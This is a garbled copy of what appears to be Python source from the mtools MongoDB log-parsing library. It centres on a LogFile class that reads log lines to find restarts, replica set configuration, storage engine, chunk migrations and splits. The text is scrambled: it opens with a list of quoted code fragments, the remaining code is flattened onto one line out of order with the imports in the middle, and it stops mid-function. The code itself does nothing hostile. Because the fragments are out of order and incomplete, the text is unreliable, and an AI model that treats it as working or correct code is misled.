self._datetime_nextpos = le._datetime_nextpos return le def", "line = line.decode(\"utf-8\", \"replace\") if (self._has_level is None and line[28:31].strip()", "isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level is None", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def", "Internal helper function. Find the current (or previous if prev=True)", "def next(self): \"\"\"Get next line, adjust for year rollover and", "0 success = True error = None self._chunk_splits.append((time, split_range, namespace,", "if (self._start is None): raise SystemExit(\"Error: <%s> does not appear", "replica set monitor for\" in line: match = re.search(\"for (?P<replSet>\\w+)/\"", "chunk_range = match.group('range') namespace = match.group('namespace') # TODO: alter this", "numSplits, success, time_taken, error)) prev_line = line # reset logfile", "= match.group('engine') else: self._storage_engine = 'mmapv1' \"\"\" For 3.2 the", "Logfile object return if self.from_stdin: return False # we should", "1 year from start time if self._end < self._start: self._start", "= None self._repl_set_protocol = None self._storage_engine = None self._datetime_format =", "format has changed, # invalidate hint info self._datetime_format = None", "= [] self._chunks_moved_to = [] self._chunk_splits = [] prev_line =", ":\" in line or \"starting:\" in line: # look for", "le.datetime: self._end = le.datetime # future iterations start from the", "@property def hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if", "3.2 the \"[initandlisten] options:\" no longer contains the \"engine\" field", "= re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' :: caused", "of the number of lines. Returns None for stdin input", "near offset %s in %s:\\n\\n%s\\n%s\\n\" \"<--- (current log parsing offset)", "currently. \"\"\" if not self._end: self._calculate_bounds() return self._end @property def", "or 'mongos' in logevent.line_str): self._binary = 'mongos' else: return False", "binary name.\"\"\" if not self._num_lines: self._iterate_lines() return self._port @property def", "= LogEvent(line) restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if", "the current (or previous if prev=True) line in a log", "# logevent indicates timestamp format has changed, # invalidate hint", "def filesize(self): \"\"\" Lazy evaluation of start and end of", "le.datetime_format self._datetime_nextpos = le._datetime_nextpos return le def __iter__(self): \"\"\" Iterate", "log file format\" % self.filehandle.name) # get end datetime (lines", "if match: time = logevent.datetime chunk_range = match.group('range') namespace =", "re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._csrs", "match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line)", "self.filehandle: logevent = LogEvent(line) lines_checked += 1 if logevent.datetime: self._start", "'mongosMain' and ('MongoS' in logevent.line_str or 'mongos' in logevent.line_str): self._binary", "hr, buff[:error_context], buff[error_context:error_context + 1], hr), file=sys.stderr) raise SystemExit(\"Cannot parse", "isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if self.binary == \"mongos\":", "self._rs_state.append(state) continue self._num_lines = ln + 1 # reset logfile", "(can be expensive).\"\"\" self._num_lines = 0 self._restarts = [] self._rs_state", "self._binary = 'mongos' else: return False version = re.search(r'(\\d\\.\\d\\.\\d+)', logevent.line_str)", "file=sys.stderr) raise SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name)", "= re.search(':: caused by :: (?P<errmsg>\\S+):', prev_line) steps = None", "Handles open file streams or stdin.\"\"\" def __init__(self, filehandle): \"\"\"Provide", "lines (can be expensive).\"\"\" self._num_lines = 0 self._restarts = []", "self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) self.filehandle.seek(curr_pos, 0) if prev and", "le: break if le.datetime >= start_dt: step_size = -abs(step_size) else:", "None self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol = None", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set @property", "iterator uses internal readahead # buffer so seek position is", "if match: time = logevent.datetime split_range = None namespace =", "if not le: break if le.datetime >= start_dt: step_size =", "self._datetime_nextpos = None elif le.datetime: # gather new hint info", "True return True def _find_curr_line(self, prev=False): \"\"\" Internal helper function.", "else: steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if", "= None self.filehandle.seek(0) # search for lower bound while abs(step_size)", "line) if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if", "self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent =", "it consumes the log line). \"\"\" if self.from_stdin: # skip", "self._storage_engine = 'wiredTiger' if \"command admin.$cmd command: { replSetInitiate:\" in", "@property def csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\" if", "if isinstance(line, bytes): line = line.decode(\"utf-8\", \"replace\") if (self._has_level is", "match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0 success = False", "for files. Streams need to be forwarded manually, and it", "max.*op_msg (?P<time_taken>\\d+)', line) if match: time = logevent.datetime split_range =", "error)) elif \"Unable to auto-split chunk\" in line: logevent =", "self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits", "and self.from_stdin: if le and le.datetime: self._start = le.datetime try:", "storage engine. There were only two engines, MMAPv1 and WiredTiger", "if tokens[1].endswith(']'): pos = 2 else: pos = 6 rs_state", "hr = \"-\" * 60 print(\"Fatal log parsing loop detected", "line) if match: errmsg = match.group('errmsg') chunk_migration = (time, chunk_range,", "self._shards @property def csrs(self): \"\"\"Lazily return the CSRS (if available)\"\"\"", "to look for the \"[initandlisten] wiredtiger_open config:\" which was present", "find last newline char jump_back = min(self.filehandle.tell(), 15000) self.filehandle.seek(-jump_back, 1)", "= (['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN'])", "'UNKNOWN']) def __len__(self): \"\"\"Return the number of lines in a", "next() iterator uses internal readahead # buffer so seek position", "(?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: if self._csrs and match.group('replSet') !=", "self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"moveChunk.from\" in", "None self._restarts = None self._binary = None self._timezone = None", "(?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if match: time = logevent.datetime split_range =", "# jump back 15k characters (at most) and find last", "(if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members @property def", "tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr]", "30000), 2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if", "if match: time = logevent.datetime split_range = match.group(\"range\") namespace =", "[] prev_line = \"\" for line in self.filehandle: if isinstance(line,", "steps = None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match:", "None self._rs_state = None self._repl_set = None self._repl_set_members = None", "self.restarts: if len(versions) == 0 or v != versions[-1]: versions.append(v)", "not self._num_lines: self._iterate_lines() return self._restarts @property def rs_state(self): \"\"\"Lazy evaluation", "filehandle.name == \"<stdin>\" self._bounds_calculated = False self._start = None self._end", "namespace, numSplits, success, time_taken, error)) elif \"splitVector\" in line: logevent", "step_size = -abs(step_size) else: step_size = abs(step_size) if not le:", "match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note = match.group('note')", "if not le: return # now walk backwards until we", "if \"[initandlisten] wiredtiger_open config:\" in line: self._storage_engine = 'wiredTiger' if", "position is wrong line = self.filehandle.readline() if isinstance(line, bytes): line", "0 error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "start_dt is reached return else: # fast bisection path max_mark", "= False # reset logfile self.filehandle.seek(0) self._bounds_calculated = True return", "from the beginning if not self.from_stdin: self.filehandle.seek(0) # return (instead", "self.states: rs_state = tokens[-1] else: # 2.6 if tokens[1].endswith(']'): pos", "self._timezone: self._calculate_bounds() return self._timezone @property def filesize(self): \"\"\" Lazy evaluation", "logevent)) if \"starting :\" in line or \"starting:\" in line:", "find moved from shard name when SERVER-45770 TICKET is added", "ret: # logevent indicates timestamp format has changed, # invalidate", "position. \"\"\" curr_pos = self.filehandle.tell() # jump back 15k characters", "= match.group('replSet') self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+),", "datetime obj using binary search. Only fast for files. Streams", "a supported \" \"MongoDB log file format\" % self.filehandle.name) #", "True: try: le = self.next() except StopIteration as e: #", "replSet\" in line: tokens = line.split() if self._hostname: host =", "self._datetime_format @property def has_level(self): \"\"\"Lazy evaluation of the whether the", "# make sure bounds are calculated before starting to iterate,", "[] self._chunks_moved_to = [] self._chunk_splits = [] prev_line = \"\"", "@property def rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not", "\\d of \\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused", "return self._chunk_splits def next(self): \"\"\"Get next line, adjust for year", "self.prev_pos = None self._has_level = None # make sure bounds", "@property def versions(self): \"\"\"Return all version changes.\"\"\" versions = []", "replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members @property", "not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return storage", "\"engine\" field So now we have to look for the", "namespace, numSplits, success, time_taken, error)) prev_line = line # reset", "3.0, but would now tell us definitively that wiredTiger is", "logevent.datetime: self._end = logevent.datetime break # if there was a", "line) if match: self._hostname = match.group('host') self._port = match.group('port') \"\"\"", "match = re.search('{ _id: \"(?P<replSet>\\S+)\", ' 'version: (?P<replSetVersion>\\d+), ', line)", "(generator). \"\"\" le = None while True: try: le =", "le.datetime and le.datetime >= start_dt: self.filehandle.seek(0) return le = None", "next line, adjust for year rollover and hint datetime format.\"\"\"", "le.datetime # future iterations start from the beginning if not", "# Assume no need to recalc bounds for lifetime of", "= None time_taken = 0 error = None self._chunk_splits.append((time, split_range,", "not self._start: self._calculate_bounds() return self._start @property def end(self): \"\"\" Lazy", "shard name when SERVER-45770 TICKET is added moved_from = \"Unknown\"", "# reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward file", "LogFile object. Return a LogEvent object for each line (generator).", "self._port else: host = os.path.basename(self.name) host += ' (self)' if", "line that would otherwise match (as it consumes the log", "logevent except StopIteration: # reached end of file return None", "\"\"\"Lazy evaluation of timezone of logfile.\"\"\" if not self._timezone: self._calculate_bounds()", "is being used \"\"\" if \"[initandlisten] wiredtiger_open config:\" in line:", "self._num_lines: self._iterate_lines() return self._port @property def versions(self): \"\"\"Return all version", "until start_dt is reached return else: # fast bisection path", "@property def num_lines(self): \"\"\" Lazy evaluation of the number of", "file and find any sharding related information \"\"\" self._shards =", "2 else: pos = 6 rs_state = ' '.join(tokens[pos:]) state", "\"\"\" Lazy evaluation of start and end of logfile. Returns", "bounds for lifetime of a Logfile object return if self.from_stdin:", "= [] self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits =", "match.group('replSetProtocol') match = re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members", "not appear to be a supported \" \"MongoDB log file", "elif \"jumbo\" in line: logevent = LogEvent(line) match = re.search('migration", "changed, # invalidate hint info self._datetime_format = None self._datetime_nextpos =", "\"success\": errmsg = None steps = re.findall('(?P<steps>step \\d of \\d):", "not self._num_lines: self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the", "subtract 1 year from start time if self._end < self._start:", "\"(?P<replSet>\\S+)\", ' 'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set =", "chunk_range = match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo') note", "= None self._binary = None self._timezone = None self._hostname =", "def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\" if not self._num_lines:", "if self.from_stdin: return None if not self._num_lines: self._iterate_lines() return self._num_lines", "in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components): self._has_level = True #", "set config logging in MongoDB 3.0+ new_config = (\"New replica", "= line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\"", "two engines, MMAPv1 and WiredTiger \"\"\" if \"[initandlisten] options:\" in", "rs_state(self): \"\"\"Lazy evaluation of all restarts.\"\"\" if not self._num_lines: self._iterate_lines()", "uses internal readahead # buffer so seek position is wrong", "wrong line = self.filehandle.readline() if isinstance(line, bytes): line = line.decode('utf-8',", "__init__(self, filehandle): \"\"\"Provide logfile as open file stream or stdin.\"\"\"", "le: return # now walk backwards until we found a", "\"<--- (current log parsing offset) \\n%s\\n%s\\n\" % (curr_pos, self.name, hr,", "make sure bounds are calculated before starting to iterate, #", "if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self): \"\"\"Return", "and le.datetime: self._end = le.datetime # future iterations start from", "in line: logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)',", "self.filehandle.seek(0) le = self.next() if le.datetime and le.datetime >= start_dt:", "return self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\"", "lower bound while abs(step_size) > 100: step_size = ceil(step_size /", "until we found a truly smaller line while self.filehandle.tell() >=", "move back to last newline char if newline_pos == -1:", "logevent = LogEvent(line) match = re.search('migration (?P<namespace>\\S+): \\[(?P<range>.*)\\)', prev_line) if", "TICKET is added moved_from = \"Unknown\" note = match.group('note') if", "self.filehandle.seek(0) self._bounds_calculated = True return True def _find_curr_line(self, prev=False): \"\"\"", "MongoDB 3.0+ new_config = (\"New replica set config in use:", "return self._repl_set_members @property def repl_set_version(self): \"\"\"Return the replSet (if available).\"\"\"", "long entry contained the \"engine\" field if WiredTiger was the", "line: logevent = LogEvent(line) match = re.search('for (?P<namespace>\\S+).*' 'numSplits: (?P<numSplits>\\d+)',", "is None: self._iterate_lines() return self._has_level @property def year_rollover(self): \"\"\"Lazy evaluation", "self._filesize = None self._num_lines = None self._restarts = None self._binary", "= \"Unknown\" note = match.group('note') if note == \"success\": errmsg", "match.group('replSet') self._repl_set_version = match.group('replSetVersion') match = re.search(', protocolVersion: (?P<replSetProtocol>\\d+), ',", "version.group(1) return version else: return False def _calculate_bounds(self): \"\"\"Calculate beginning", ":: (?P<errmsg>\\S+):', prev_line) steps = None if match: errmsg =", "\"splitVector\" in line: logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,'", "the beginning if not self.from_stdin: self.filehandle.seek(0) # return (instead of", "rs_state = tokens[-1] state = (host, rs_state, LogEvent(line)) self._rs_state.append(state) continue", "current seek position. \"\"\" curr_pos = self.filehandle.tell() # jump back", "stream or stdin.\"\"\" self.filehandle = filehandle self.name = filehandle.name self.from_stdin", "False time_taken = 0 error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace,", "logfile.\"\"\" if self._bounds_calculated: # Assume no need to recalc bounds", "logevent.datetime chunk_range = match.group('range') namespace = match.group('namespace') moved_to = match.group('movedTo')", "le = None self.filehandle.seek(0) # search for lower bound while", "le and le.datetime: self._start = le.datetime try: yield le except", "< self._start: self._start = self._start.replace(year=self._start.year - 1) self._year_rollover = self._end", "now in state\" in line: tokens = line.split() # 2.6", "None namespace = match.group(\"namespace\") numSplits = match.group('numSplits') success = None", "true\" in line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members: (?P<replSetMembers>[^]]+", "= re.search('members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set_members = match.group('replSetMembers')", "[] self._chunks_moved_from = [] self._chunks_moved_to = [] self._chunk_splits = []", "= LogEvent(line) if \"New replica set config in use\" in", "if not self._num_lines: self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy", "return le def __iter__(self): \"\"\" Iterate over LogFile object. Return", "# including potential year rollovers self._calculate_bounds() @property def start(self): \"\"\"", "input if not self.start and self.from_stdin: if le and le.datetime:", "roll forward until we found a line with a datetime", "self._repl_set = None self._repl_set_members = None self._repl_set_version = None self._repl_set_protocol", "self._calculate_bounds() return self._end @property def timezone(self): \"\"\"Lazy evaluation of timezone", "this shard (if available)\"\"\" if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from", "match.group('replSet'), match.group('replSetMembers') ) if \"Starting new replica set monitor for\"", "= (time, chunk_range, moved_from, namespace, steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if", "logevent = LogEvent(line) match = re.search('splitVector: \"(?P<namespace>\\S+)\".*,' ' (?P<range>min:.*), max.*op_msg", "self.year_rollover) if not ret: # logevent indicates timestamp format has", "\"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if match:", "line in a log file based on the current seek", "logevent.datetime: logevent = self.next() return logevent except StopIteration: # reached", "newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back +", "= match.group('host') self._port = match.group('port') \"\"\" For 3.0 the \"[initandlisten]", "self._datetime_nextpos is not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if", "= line.decode('utf-8', 'replace') if line == '': raise StopIteration line", "None steps = re.findall('(?P<steps>step \\d of \\d): (?P<stepTimes>\\d+)', line) else:", "\"MongoDB log file format\" % self.filehandle.name) # get end datetime", "split vector for\" in line: logevent = LogEvent(line) match =", "match.group(\"namespace\") numSplits = 0 success = False time_taken = 0", "success, time_taken, error)) elif \"jumbo\" in line: logevent = LogEvent(line)", "is None and line[28:31].strip() in LogEvent.log_levels and line[31:39].strip() in LogEvent.log_components):", "'initandlisten' and \"db version v\" in logevent.line_str): self._binary = 'mongod'", "while not logevent.datetime: logevent = self.next() return logevent except StopIteration:", "= match.group(\"namespace\") numSplits = match.group('numSplits') success = None time_taken =", "False self._start = None self._end = None self._filesize = None", "with a datetime try: logevent = self.next() while not logevent.datetime:", "match: csrs_info = (match.group('csrsName'), match.group('replSetMembers')) self._csrs = csrs_info else: match", "us definitively that wiredTiger is being used \"\"\" if \"[initandlisten]", "if self._hostname: host = self._hostname + ':' + self._port else:", "supported \" \"MongoDB log file format\" % self.filehandle.name) # get", "self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting :\" in line", "are at most 10k, # go back 30k at most", "= None self._hostname = None self._port = None self._rs_state =", "if match: self._repl_set = match.group('replSet') self._repl_set_version = match.group('replSetVersion') match =", "restart = self._check_for_restart(logevent) if restart: self._restarts.append((restart, logevent)) if \"starting :\"", "= logevent.datetime_format self._datetime_nextpos = logevent._datetime_nextpos break if lines_checked > max_start_lines:", "if not self._num_lines: self._iterate_lines() return self._storage_engine @property def shards(self): \"\"\"Lazily", "= re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match:", "now walk backwards until we found a truly smaller line", "line). \"\"\" if self.from_stdin: # skip lines until start_dt is", "self._repl_set_members = match.group('replSetMembers') # if (\"is now in state\" in", "e: # end of log file, get end date if", "return le = None self.filehandle.seek(0) # search for lower bound", "self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line)", "else: host = os.path.basename(self.name) host += ' (self)' if tokens[-1]", "abs(step_size) if not le: return # now walk backwards until", "contains the \"engine\" field So now we have to look", "# 2.6 if tokens[1].endswith(']'): pos = 4 else: pos =", "True error = None self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken,", "class. Handles open file streams or stdin.\"\"\" def __init__(self, filehandle):", "'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self): \"\"\"Return the", "= match.group(\"namespace\") time_taken = match.group(\"time_taken\") numSplits = 0 success =", "Replica set config logging in MongoDB 3.0+ new_config = (\"New", "line.rstrip('\\n') le = LogEvent(line) # hint format and nextpos from", "\"configsvr: true\" in line: match = re.search(' _id: \"(?P<replSet>\\S+)\".*' 'members:", "logfile. Returns None for stdin input currently. \"\"\" if self.from_stdin:", "LogFile(InputSource): \"\"\"Log file wrapper class. Handles open file streams or", "the split vector for\" in line: logevent = LogEvent(line) match", "error = \"Jumbo\" self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))", "isinstance(line, bytes): line = line.decode('utf-8', 'replace') if line == '':", "if le and le.datetime: self._start = le.datetime try: yield le", "None # make sure bounds are calculated before starting to", "line, adjust for year rollover and hint datetime format.\"\"\" #", "for line in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end", "number of lines in a log file.\"\"\" return self.num_lines def", "if self._csrs and match.group('replSet') != self._csrs[0]: self._shards.append(( match.group('replSet'), match.group('replSetMembers') ))", "if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers') ) if \"Starting", "# gather new hint info from another logevent self._datetime_format =", "None if not self._filesize: self._calculate_bounds() return self._filesize @property def datetime_format(self):", "within max_start_lines max_start_lines = 10 lines_checked = 0 # get", "moved_to = match.group('movedTo') note = match.group('note') if note == \"success\":", "@property def chunks_moved_to(self): \"\"\"Lazily return the chunks moved to this", "the number of lines in a log file.\"\"\" return self.num_lines", "in line: if \"configsvr: true\" in line: match = re.search('", "version else: return False def _calculate_bounds(self): \"\"\"Calculate beginning and end", "else: match = re.search(\"for (?P<shardName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match: shard_info", "(?P<replSetMembers>[^]]+ ])', line) if match: self._csrs = ( match.group('replSet'), match.group('replSetMembers')", "logevent.line_str or 'mongos' in logevent.line_str): self._binary = 'mongos' else: return", "log file.\"\"\" return self.num_lines def _iterate_lines(self): \"\"\"Count number of lines", "self._year_rollover = self._end else: self._year_rollover = False # reset logfile", "= [] prev_line = \"\" for line in self.filehandle: if", "logevent.datetime split_range = match.group(\"range\") namespace = match.group(\"namespace\") numSplits = 0", "as open file stream or stdin.\"\"\" self.filehandle = filehandle self.name", "= re.search('replSet: \"(?P<replSet>\\S+)\"', line) if match: self._repl_set = match.group('replSet') match", "None self._storage_engine = None self._datetime_format = None self._year_rollover = None", "information \"\"\" self._shards = [] self._chunks_moved_from = [] self._chunks_moved_to =", "PEP 479 return # get start date for stdin input", ">= 2 and (le.datetime is None or le.datetime >= start_dt):", "not logevent.datetime: logevent = self.next() return logevent except StopIteration: #", "1) buff = self.filehandle.read(curr_pos) hr = \"-\" * 60 print(\"Fatal", ")) elif not self._csrs: self._csrs = ( match.group('replSet'), match.group('replSetMembers') )", "first datetime self.filehandle.seek(0) le = self.next() if le.datetime and le.datetime", "in reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end = logevent.datetime", "file, get end date if not self.end and self.from_stdin: if", "= False self._start = None self._end = None self._filesize =", "in line: tokens = line.split() if self._hostname: host = self._hostname", "1 if logevent.datetime: self._start = logevent.datetime self._timezone = logevent.datetime.tzinfo self._datetime_format", "in line[:100]: logevent = LogEvent(line) restart = self._check_for_restart(logevent) if restart:", "host += ' (self)' if tokens[-1] in self.states: rs_state =", "self._num_lines = ln + 1 # reset logfile self.filehandle.seek(0) def", "error)) prev_line = line # reset logfile self.filehandle.seek(0) def fast_forward(self,", "def binary(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "self.filehandle.seek(0) # return (instead of raising StopIteration exception) per PEP", "prev=True) line in a log file based on the current", "there was a roll-over, subtract 1 year from start time", "the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_members", "(?P<range>.*\\}).*.*note: \"(?P<note>\\S+)\"', line) if match: time = logevent.datetime chunk_range =", "re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: { (?P<range>.*\\}).*' 'to: \"(?P<movedTo>\\S+)\".*note: \"(?P<note>\\S+)\"', line) if", "if not self._chunks_moved_from: self._find_sharding_info() return self._chunks_moved_from @property def chunk_splits(self): \"\"\"Lazily", "name when SERVER-45770 TICKET is added moved_from = \"Unknown\" note", "@property def storage_engine(self): \"\"\"Return storage engine if available.\"\"\" if not", "None while True: try: le = self.next() except StopIteration as", "if \"starting :\" in line or \"starting:\" in line: #", "\"[initandlisten] wiredtiger_open config:\" which was present in 3.0, but would", "'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def __len__(self):", "re.search(\"chunk \\[(?P<range>.*)\\) \" 'in namespace (?P<namespace>\\S+)' ' :: caused by", "for stdin input if not self.start and self.from_stdin: if le", "line: logevent = LogEvent(line) match = re.search('ns: \"(?P<namespace>\\S+)\".*' 'details: {", "and ('MongoS' in logevent.line_str or 'mongos' in logevent.line_str): self._binary =", "= logevent.datetime split_range = None namespace = match.group(\"namespace\") numSplits =", "':' + self._port else: host = os.path.basename(self.name) host += '", "= 300 self.filehandle.seek(-error_context, 1) buff = self.filehandle.read(curr_pos) hr = \"-\"", "in line: match = re.search(\"for (?P<replSet>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if match:", "steps, note, errmsg) self._chunks_moved_to.append(chunk_migration) if \"Finding the split vector for\"", "__len__(self): \"\"\"Return the number of lines in a log file.\"\"\"", "tokens = line.split() if self._hostname: host = self._hostname + ':'", "year_rollover(self): \"\"\"Lazy evaluation of the datetime format.\"\"\" if self._year_rollover is", "= re.search('engine: \"(?P<engine>\\S+)\"', line) if match: self._storage_engine = match.group('engine') else:", "continue if \"[rsMgr] replSet\" in line: tokens = line.split() if", "(at most) and find last newline char jump_back = min(self.filehandle.tell(),", "show before/after the log offset error_context = 300 self.filehandle.seek(-error_context, 1)", "rs_state, LogEvent(line)) self._rs_state.append(state) continue if \"[rsMgr] replSet\" in line: tokens", "config logging in MongoDB 3.0+ new_config = (\"New replica set", "self.filehandle.seek(0, 2) self._filesize = self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line", "= self.filehandle.tell() self.filehandle.seek(-min(self._filesize, 30000), 2) for line in reversed(self.filehandle.readlines()): logevent", "_find_curr_line() self.prev_pos = None self._has_level = None # make sure", "tell us definitively that wiredTiger is being used \"\"\" if", "self._iterate_lines() return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion", "the current seek position. \"\"\" curr_pos = self.filehandle.tell() # jump", "if newline_pos == -1: self.filehandle.seek(0) return self.next() self.filehandle.seek(newline_pos - jump_back", "in use\" in line: if \"configsvr: true\" in line: match", "\"\"\"Provide logfile as open file stream or stdin.\"\"\" self.filehandle =", "def start(self): \"\"\" Lazy evaluation of start and end of", "self.prev_pos = curr_pos if isinstance(buff, bytes): buff = buff.decode(\"utf-8\", \"replace\")", "\"[mongosMain]\" in line: match = re.search(\"for (?P<csrsName>\\w+)/\" \"(?P<replSetMembers>\\S+)\", line) if", "= match.group('errmsg') else: errmsg = \"Unknown\" chunk_migration = (time, chunk_range,", "all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._rs_state @property def", "2.6 if tokens[1].endswith(']'): pos = 2 else: pos = 6", "'members: (?P<replSetMembers>[^]]+ ])', line) if match: self._repl_set = match.group('replSet') self._repl_set_members", "line: if \"configsvr: true\" in line: match = re.search(' _id:", "in _find_curr_line() self.prev_pos = None self._has_level = None # make", "line # reset logfile self.filehandle.seek(0) def fast_forward(self, start_dt): \"\"\" Fast-forward", "def chunks_moved_from(self): \"\"\"Lazily return the chunks moved from this shard", "return the chunks split in this shard (if available)\"\"\" if", "None match = re.search('errmsg: \"(?P<errmsg>.*)\"', line) if match: errmsg =", "= 10 lines_checked = 0 # get start datetime for", "= False time_taken = 0 error = \"Jumbo\" self._chunk_splits.append((time, split_range,", "beginning and end of logfile.\"\"\" if self._bounds_calculated: # Assume no", "all restarts.\"\"\" if not self._num_lines: self._iterate_lines() return self._restarts @property def", "error = match.group(\"error\") self._chunk_splits.append((time, split_range, namespace, numSplits, success, time_taken, error))", "if version: version = version.group(1) return version else: return False", "= None self._filesize = None self._num_lines = None self._restarts =", "the replSet (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set", "when SERVER-45770 TICKET is added moved_from = \"Unknown\" note =", "self._repl_set @property def repl_set_members(self): \"\"\"Return the replSet (if available).\"\"\" if", "protocolVersion (if available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property", "For 3.2 the \"[initandlisten] options:\" no longer contains the \"engine\"", "available).\"\"\" if not self._num_lines: self._iterate_lines() return self._repl_set_protocol @property def storage_engine(self):", "python3 from __future__ import print_function import os import re import", "self._repl_set_protocol = None self._storage_engine = None self._datetime_format = None self._year_rollover", "import ceil from mtools.util.input_source import InputSource from mtools.util.logevent import LogEvent", "SystemExit(\"Cannot parse %s with requested options\" % self.filehandle.name) else: self.prev_pos", "- 1) self._year_rollover = self._end else: self._year_rollover = False #", "def hostname(self): \"\"\"Lazy evaluation of the binary name.\"\"\" if not", "le and le.datetime: self._end = le.datetime # future iterations start", "or \"starting:\" in line: # look for hostname, port match", "parse %s with requested options\" % self.filehandle.name) else: self.prev_pos =", "\\d): (?P<stepTimes>\\d+)', line) else: match = re.search(':: caused by ::", "= 0 for ln, line in enumerate(self.filehandle): if isinstance(line, bytes):", "file format\" % self.filehandle.name) # get end datetime (lines are", "not None: ret = le.set_datetime_hint(self._datetime_format, self._datetime_nextpos, self.year_rollover) if not ret:", "new replica set monitor for\" in line: match = re.search(\"for", "(['PRIMARY', 'SECONDARY', 'DOWN', 'STARTUP', 'STARTUP2', 'RECOVERING', 'ROLLBACK', 'ARBITER', 'UNKNOWN']) def", "return self._repl_set_version @property def repl_set_protocol(self): \"\"\"Return the replSet protocolVersion (if", "now we have to look for the \"[initandlisten] wiredtiger_open config:\"", "except StopIteration: # reached end of file return None def", "self._iterate_lines() return self._binary @property def hostname(self): \"\"\"Lazy evaluation of the", "reversed(self.filehandle.readlines()): logevent = LogEvent(line) if logevent.datetime: self._end = logevent.datetime break", "15000) self.filehandle.seek(-jump_back, 1) buff = self.filehandle.read(jump_back) 